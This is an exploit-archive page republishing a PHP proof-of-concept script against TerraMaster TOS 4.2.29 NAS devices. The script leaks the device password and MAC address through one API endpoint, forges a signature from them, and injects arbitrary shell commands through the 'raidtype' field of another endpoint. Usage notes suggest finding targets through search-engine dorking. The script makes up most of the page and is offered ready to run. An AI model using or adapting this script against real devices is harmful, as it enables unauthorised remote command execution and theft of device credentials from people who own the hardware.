Security
Headlines
HeadlinesLatestCVEs

Headline

TerraMaster TOS 4.2.29 Code Injection / Local File Inclusion

TerraMaster TOS version 4.2.29 suffers from a remote code injection vulnerability leveraging a local file inclusion vulnerability.

Packet Storm
#vulnerability#web#mac#windows#google#js#php#rce#auth#firefox
=============================================================================================================================================| # Title     : TerraMaster TOS 4.2.29 Code Injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.terra-master.com/global/alltos/                                                                                 |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 138 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass TerraMasterExploit{    private $targetUri;    private $data = [];    private $terramaster = [];    public function __construct($targetUri)    {        $this->targetUri = rtrim($targetUri, '/') . '/';    }    public function getData()    {        // Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`        $response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);                if ($response && strpos($response, 'webNasIPS successful') !== false) {            // Parse the JSON response and get the data            $resJson = json_decode($response, true);            if (!empty($resJson['data'])) {                $this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);                $this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);                $this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries                $this->data['timestamp'] = time();                // derive signature                $this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);            }        }    }    private function tosEncryptStr($key, $strToEncrypt)    {        $id = $key . $strToEncrypt;        return md5($id);    }    public function executeCommand($cmd)    {        // Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`        $diskstring = $this->generateRandomString(4, 8);        $headers = [            'User-Agent' => 'TNAS',            'Authorization' => $this->data['password'],            'Signature' => $this->data['signature'],            'Timestamp' => $this->data['timestamp']        ];        $this->sendRequest('POST', 'module/api.php?mobile/createRaid', [            'raidtype' => ';' . $cmd,            'diskstring' => $diskstring        ], $headers);    }    public function getTerramasterInfo()    {        // get Terramaster CPU architecture and TOS version        $response = $this->sendRequest('GET', 'tos/index.php?user/login');        if ($response) {            preg_match('/ver=.+?"/', $response, $matches);            if ($matches) {                $version = $matches[0];                // check if architecture is ARM64 or X64                if (strpos($version, '_A') !== false) {                    $this->terramaster['cpu_arch'] = 'ARM64';                } elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {                    $this->terramaster['cpu_arch'] = 'X64';                } else {                    $this->terramaster['cpu_arch'] = 'UNKNOWN';                }                // strip TOS version number and remove trailing double quote.                $this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');            }        }    }    public function check()    {        $this->getTerramasterInfo();        if (empty($this->terramaster)) {            return 'Safe';        }        if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {            return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";        }        return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";    }    public function exploit()    {        $this->getData();        if (empty($this->data)) {            throw new Exception('Cannot retrieve the leaked data.');        }        echo "Executing exploit...\n";        // Example command to execute        $this->executeCommand('whoami'); // Replace 'whoami' with desired command    }    private function sendRequest($method, $uri, $data = [], $headers = [])    {        $url = $this->targetUri . $uri;        $options = [            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => strtoupper($method),            CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)        ];        if (strtoupper($method) === 'POST') {            $options[CURLOPT_POSTFIELDS] = http_build_query($data);        } else {            $options[CURLOPT_URL] = $url;        }        $ch = curl_init();        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    private function generateRandomString($minLength, $maxLength)    {        $length = rand($minLength, $maxLength);        return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);    }}// Usage$exploit = new TerraMasterExploit('http://target-terramaster-url.com');$check = $exploit->check();echo $check . "\n";if (strpos($check, 'Vulnerable') !== false) {    $exploit->exploit();}Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution